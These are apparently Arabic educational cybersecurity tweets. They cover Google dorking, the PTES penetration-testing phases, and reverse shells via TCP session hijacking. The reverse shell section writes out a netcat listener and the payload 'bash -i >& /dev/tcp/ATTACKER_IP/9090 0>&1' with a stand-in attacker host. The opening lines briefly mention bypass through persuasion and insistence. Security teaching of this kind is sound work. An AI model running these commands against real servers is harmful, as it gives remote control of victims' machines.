Live demo for both platforms.

التجاوز من خلال المحادثات و أسلوب الإقناع و الإلحاح.

#الامن_السيبراني #اختبار_الاختراق 🔴 للتذكير: افشاء ونشر معلومات سرية خاصة بمؤسسة معينة و/أو أفراد تعد جريمة إلكترونية يحاسب عليها القانون. 🏴‍☠️ Google Hacking تعتبر أحد الأساليب و الأدوات لجمع المعلومات حول هدف معين بطريقة غير مباشرة 🕵🏻‍♂️ Passive Reconnaissance يقوم Google بتشغيل محرك البحث الأكثر استخدامًا على الإنترنت. Google Hacking ✅ ماهو قوقل هاكنق؟ يسمى أيضًا Google Dorking، هو أسلوب يستخدم للعثور على الثغرات الأمنية والمعلومات الحساسة التي يمكن الوصول إليها عبر الإنترنت. حيث أن Google يقوم بتصفح كل صفحة تقريبًا في كل موقع ويب، ويبني قاعدة بيانات ضخمة لكافة المعلومات التي يجمعها. باعتبارك مختبر اختراق أو هاكر ، قد توفر قاعدة بيانات Google معلومات قد تكون لا تقدر بثمن، بما في ذلك بيانات حساسة أو كلمات المرور حول الأهداف المحتملة. ✅كيف يعمل هذا الأسلوب؟ يتم تحقيق Google Hacking باستخدام استعلامات بحث Search Queries محددة على محركات البحث مثل Google وغيرها من المحركات الأخرى. تعمل هذه الاستعلامات، التي يشار إليها غالبًا باسم Google Dorks، على الاستفادة من خصائص وعمليات تشغيل البحث المتقدمة لتصفية المعلومات الدقيقة واسترجاعها. Syntax: operator:search_term Example: site:example.com بعض الأمثلة على قوقل دوركس: site: Usage: site:example.com الغرض: تضييق نتائج البحث على الموقع المحدد. intext: Usage: intext:"confidential document" الروابط التالية تحتوي على مراجع لهذه الدوركس. exploit-db.com/google-hackin… pastebin.com/qDAW5LAY gist.github.com/Juan-Embid/3… gist.github.com/Mrjoestar-sa… gist.github.com/stevenswaffo… exposingtheinvisible.org/gui… هذه أداة مساعدة لكتابة الكويريز dorksearch.com/

📝 أشهر منهجيات #اختبار_الاختراق الشائعة و المستخدمة. 🔺 يوجد الكثير من المنهجيات Methodologies المستخدمة لاختبار الاختراق، و تختلف هذه المنهجيات بالأهداف التي تم تخصيصها لأجلها وبمجال اختبار الاختراق وما يتضمنه،،ولكن جميعها تهدف إلى اكتشاف نقاط الضعف الأمنية و ضمان معالجتها و ضمان خلو هذه الجهة من الثغرات الأمنية. 🔺قد تكون أحد هذه المنهجيات مناسبة وملائمة أكثر من غيرها، وذلك يعتمد بالكامل على احتياجات وبيئة المنظمة المراد اختبارها. 🔺من المهم لمحترفي الأمن السيبراني أن يكونوا على دراية بهذه المنهجيات و أن يفهموا كيف يتم تطبيقها في حالات مختلفة. 📌 أشهر خمسة منهجيات شائعة و مستخدمة. 1. Open Source Security Testing Methodology Manual (OSSTMM) 2. Penetration Testing Execution Standard (PTES) 3. Information Systems Security Assessment Framework (ISSAF) 4. NIST Special Publication 800-115 5. OWASP Testing Guide 🔺بالإمكان البحث عن هذه المنهجيات لمعلومات أكثر، هنا سنقوم بمناقشة النهج رقم 2 🔺بعد أن نقوم بالتعرف علي PTEST و مراحل اختبار الاختراق و أهداف و أنشطة كل مرحلة سنقوم لاحقًا بتطبيق عملي لهذه الخطوات وبشكل واقعي. ✅ Penetration Testing Execution Standard (PTES) 🔺هو عبارة عن إطار اختبار مصمم ليكون بمثابة معيار لإجراء اختبار الاختراق. تم تطويره من قبل مجموعة من خبراء الأمن لتوفير منهجية قابلة للتكرار ومتسقة لاختبار الاختراق. 🔺 يعد هذا الإطار معروفًا بشكل جيد ومصممًا لتوفير ارشادات واضحة لاجرات اختبارات الاختراق. 🔺 يقسم PTEST إلى سبعة أقسام " مراحل" أساسية تغطي جميع جوانب اختبار الاختراق. PTES Sessions/ Phases 🔺 يوجد لكل مرحلة أهداف محددة تتم من خلال اجراءات و أنشطة معينة ، هذه السبع مراحل كالآتي: ✅ 1. تفاعل ما قبل الاشتباك Pre-engagement Interactions: 📌تهدف هذه المرحلة إلى تحديد قواعد الاختبار ومجاله. 🔺الهدف: إنشاء اتفاق وتفاهم و اتصال واضح بين فريق اختبار الاختراق والعميل. 🔺الأنشطة الرئيسية: تحديد نطاق وقواعد الاختبار وأهدافه وآثاره ، كذلك الحصول على الوثائق والأذونات القانونية اللازمة. 🔺الأهمية: التأكد من أن كلا الطرفين لديهم فهم متبادل لحدود الاختبار. يوجد العديد من الأسئلة التي تتم في هذه المرحلة للحصول على تفاهم تام حول الاختبار ،، تتنوع هذه الأسئلة بين أسئلة فنية، و قانونية وغيرها. ✅ 2. جمع المعلومات Intelligence Gathering: 📌 هذه المرحلة تشبه جمع المعلومات الاستخبارية قبل تنفيذ مهمة في العالم الحقيقي. 🔺الهدف: جمع أكبر قدر ممكن من المعلومات حول المنظمة المستهدفة وأنظمتها. 🔺الأنشطة الرئيسية: البحث عن معلومات المنظمة المستهدفة، استكشاف شبكاتها، وجمع المعلومات حول البنية التحتية والتقنيات المستخدمة والموظفين المستهدفين. 🔺الأهمية: يساعد في تحديد نقاط الضعف المحتملة والتخطيط لطرق و أساليب الهجوم. 🚨 تشكل هذه المرحلة 90٪ و أكثر من عملية الاختبار ومن اختصار ونجاح وموثوقية وكفاءة اختبار الاختراق…كذلك عند الفشل في ملاحظة أو تحديد معلومة هامة معينة قد يؤدي ذلك إلى فشل اختبار الاختراق وتمكن المهاجمين من استغلال هذا الشيء رغم تنفيذ اختبار الاختراق. 🚨 تعد هذه المرحلة هي الأساس لكافة المراحل القادمة،،الفشل في هذه المرحلة أو التقصير قد يؤدي إلى فشل تام للاختبار. ✅ 3. نمذجة التهديدات والمخاطر Thread Modeling : 📌في هذه المرحلة يتم إنشاء نماذج تصف كيف يمكن للمهاجمين اختراق النظام وإحداث الضرر. 🔺الهدف: تحديد وترتيب أولويات التهديدات المحتملة للهدف. 🔺الأنشطة الرئيسية: تحليل المعلومات التي تم جمعها لتحديد نقاط الضعف والتهديدات الخاصة بالمنظمة. 🔺الأهمية: تمكن فريق الاختبار من تركيز جهودهم على طرق الهجوم الواقعية وذات الصلة، مما يحسن كفاءة الاختبار وأهميته. ✅4. تحليل نقاط الضعف والثغرات Vulnerability Analysis: 📌 في هذه المرحلة يتم اكتشاف وتحليل نقاط الضعف التقنية مثل نقاط الضعف في نظام التشغيل والشبكة والتطبيقات بالإضافة إلى تقييم خطورة نقاط الضعف هذه "Critical , High, Low etc.. ". 🔺الهدف: اكتشاف نقاط الضعف داخل النظام. 🔺الأنشطة الرئيسية: استخدام الأدوات والتقنيات اليدوية لتحديد نقاط الضعف في النظام. 🔺الأهمية: توفير قائمة شاملة بنقاط الضعف التي يمكن استغلالها من قبل المهاجمين، وتعتبر بمثابة الأساس للمرحلة التالية. ✅5. استغلال الثغرات Exploitation: 📌تهدف هذه المرحلة إلى محاولة الوصول الغير مصرح به إلى الأنظمة من خلال تقنيات وطرق الاختراق مثل اختراق كلمة المرور والهندسة الاجتماعية وتجاوز جدران الحماية وغيرها.. 🔺الهدف: استغلال نقاط الضعف المحددة بأمان لتحديد ومعرفة تأثيرها. 🔺الأنشطة الرئيسية: محاولة اختراق الأنظمة وقيودها الأمنية والحصول على وصول غير مصرح به باستخدام نقاط الضعف المحددة. 🔺الأهمية: يوضح التأثير الواقعي لنقاط الضعف، ويقدم دليلاً ملموسًا على نقاط ضعف النظام. ✅ 6. مابعد الاستغلال Post Exploitation: 📌 تهدف هذه المرحلة إلى استخراج البيانات من الأنظمة المخترقة، والحفاظ على الوصول، وتغطية ومسح الآثار، والانتقال إلى أنظمة أخرى. 🔺الهدف: تحديد قيمة النظام المخترق والحفاظ على التحكم والوصول لهذا النظام لاستخدامه لاحقًا. 🔺الأنشطة الرئيسية: تحديد ما يمكن فعله بالنظام المخترق، وتحديد إمكانيات استخراج البيانات، وفهم مستوى الوصول الذي تم الحصول عليه. 🔺الأهمية: توفير نظرة مفصلة للأضرار المحتملة وفقدان البيانات التي قد تحدث في هجوم حقيقي. ✅ 7. التوثيق وكتابة التقارير Reporting : 📌 توثيق الاكتشافات ونقاط الضعف والأنظمة المستغلة وتحليل النتائج وتقديم حلول واستراتيجيات موصى بها لمنع نقاط الضعف هذه واستغلالها من قبل المهاجمين. 🔺الهدف: توثيق النتائج والتوصيات الأمنية. 🔺الأنشطة الرئيسية: إعداد تقرير شامل يوضح بالتفصيل نقاط الضعف ونتائج الاستغلال وخطوات المعالجة. 🔺الأهمية: تقدم للعميل معلومات قابلة للتنفيذ لتحسين وضعه الأمني، وإصلاح نقاط الضعف المحددة، ومنع الانتهاكات المستقبلية. 📝 في التغريدة القادمة سنرى مثال شامل لهذه الخطوات

✅🏴‍☠️Reverse Shell Using TCP Session Hijacking في التغريدات السابقة تكلمنا عن هجوم اختطاف جلسة TCP وتنفيذ أوامر ضارة على السرفر… 🔺 التكنيك السابق يكون مناسب في حالة كنا مهتمين بحقن وتنفيذ أمر واحد على السرفر ،، ولكن في حالة تنفيذ عدة أوامر يعتبر هذا الاسلوب غير عملي، لأن بكل مره تحتاج تختطف الجلسة وتنفذ أمر معين،، ف يعتبر اسلوب غير عملي… 📌 الهاكرز عادةً يحتاجون ينفذون عدة أوامر وليس أمر واحد فقط،،،ولتحقيق هالشيء فأفضل طريقة لتنفيذه هي تشغيل برنامج شل Shell Program-bash 🤔 ممكن بتقول أوك الموضوع بسيط،، بدال ما أني اكتب أمر لانشاء ملف أو تنزيل صورة من النت "زي ما شفنا بالفيديو السابق" راح اشغل برنامج الشل /bin bash بالتالي البرنامج بيشتغل وبيتنفذ،،،،،هذا الكلام صحيح ،، اذا نفذت هذا الأمر بيشتغل البرنامج على جهاز السرفر "الضحية".. 📌 بس المشكلة وين؟? 🔴 المشكلة في الانبوت لهذا البرنامج،،،بياخذها من نفس السرفر وكذلك الاوتبوت بياخذه من نفس السرفر ،، بمعنى ما استفدنا ولا شيء لأن اساسا ماعندنا وصول لبرنامج الباش نفسه ع السرفر عشان نعطيه الانبوت "الاوامر " اللي نبي ينفذها وبنفس الوقت مانقدر نشوف المخرجات لأن اساسا قاعده تنطبع ع السرفر نفسه مب جهاز الأتاكر.. 🔺 ف ياه نفس ماقلنا نقدر نحقن الأمر وبيشتغل وكل شيء تمام بس ماراح نقدر نكتب أوامر ونشوف النتائج لأنه قاعد يشتغل ع السرفر و لأننا ببساطة مب قدام الجهاز نفسه،،فما عندنا أي كنترول ع هالشيء فما يهم فعليا شغلت البرنامج ولا لا لأن ماراح تستفيد منه بهذي الطريقة.. 🔺 السؤال ،،كيف نحل هذي المشكلة،،،بمعنى كيف نشغل برنامج الشل bash ويصير ياخذ الانبوت "الاوامر" منا وبنفس الوقت اذا بيطبع شيء ينطبع ع جهازنا "كمهاجمين" بدال ما ينطبع على جهاز الضحية"السرفر". 📝 نحتاج الى طريقة بحيث ان الانبوت والاوتبوت للبرنامج هذا نعيد توجيهها i/o redirection بحيث تجي وتروح لجهاز المهاجم،، يعني نحتاج نعكس reverse الطريقة التقليدية لاخذ المدخلات والمخرجات باعادة توجيهها لجهاز اخر ✅ هذي هي الفكرة الرئيسية و باختصار لما يسمى ب Reverse Shell وهو الهجوم اللي راح ننفذ هذي المرة ،، عملية فهم مبدأ وعمل Reverse Shell بعمق وبشكل كبير يتطلب منك معرفة متوسطة بأساسيات عمل النظام زي مثلا file descriptor , standard I/O redirection وغيرها ولكن هذي المفاهيم الأساسية خارج سكوب هذا الموضوع كوننا نتكلم عن سايبر أتاكس ولأن بيطول الكلام أكثر من كذا لو بنتكلم عنها ولكن بحاول اذا جينا للأوامر أعلق عليها بشكل مختصر.. 📝 خلونا نرتب الأفكار: أولا: اختطاف جلسة TCP مناسبة عند الرغبة بتنفيذ أمر واحد فقط،، ثانيا: الهاكرز يبحثون عن طريقة تمنكهم من اعطاء عدة أوامر وليس أمر واحد فقط. ثالثا: احد الطرق الممكنة لتنفيذ هذا الشيء هو ما يسمى ب Reverse Shell رابعا: : Reverse Shell هو عبارة عن أسلوب شائع يستخدم في السايبر "سواءً لأغراض مشروعة أو ضارة"، بحيث يسمح لطرف خارج"المهاجم" ببدء برنامج command shell على جهاز اخر"الضحية"،، بالتالي منح هذا الطرف "المهاجم "تحكم كامل على هذا الجهاز"الضحية". بالعادة في shell التقليدي أو العادي ،، العميل يتصل بالسرفر ويعطيه الأوامر لتنفيذها،، هنا بيصير العكس تماما عشان كذا نسميه Reverse shell وهو أن السرفر يسوي اتصال عكسي لجهاز المهاجم ونسوي اعادة توجيه للمدخلات والمخرجات الى جهاز المهاجم. كيف يعمل Reverse Shell؟ How Reverse Shell Works? ✅1.Listner Setup : في هذي الخطوة المهاجم يقوم بتجهيز "مستمع Listener " على جهازه عشان يستقبل الاتصالات ،، هالشيء يتم بعدة طرق و أدوات من أشهرها طبعًا nectat اللي بنسويه هنا كماهجمين،،،نفتح اتصال nectat على port معين مثلا 4444 او 9090 او غيره ونصير ننتظر الاتصالات اللي بتجي. ليه احتجنا هالشيء؟ لأن باختصار قلنا في البداية ان السرفر "الضحية "بيعكس الاتصال وبيوديه لجهاز اخر،،،هنا احنا فتحنا مستمع عشان اذا جاء الاتصال من السرفر نستقبله وبكذا صار متصل فينا ونقدر نعطيه الاوامر اللي نبي ونشوف المخرجات. هذا الامر اللي بنحتاجه nc -lvnp 4444 or nc -l -p 9090 ✅2. Execution على جهاز الضحية نحقن الأمر لتشغيل برنامج الشل طبعا احنا بنختطف جلسة TCP ونحقن الأمر اللي بيشغل برنامج الشل على السرفر زي مثلا: bash -i >& /dev/tcp/ATTACKER_IP/9090 0>&1 هنا قاعدين نقوله: شغل برنامج الشل، وسويلي اعادة توجيه للانبوت والاوتبوت الى عنوان ip المعطى على البورت port المعطى ✅3. Command Execution الى هذي اللحظة ومن خلال الاتصال اللي تم انشاءه صار المهاجم عنده تحكم كامل على السرفر ، بمعنى الحين يقدر ينفذ أي اوامر يبيها وكأنه امام السرفر حرفيًا. "يعتمد على مستوى الوصول لبرنامج الشل اللي اشتغل ومدى الصلاحيات الممنوحه له ولكن نقدر نرقيها في حالة احتجنا بأساليب اخرى خارج سكوب الموضوع ذا"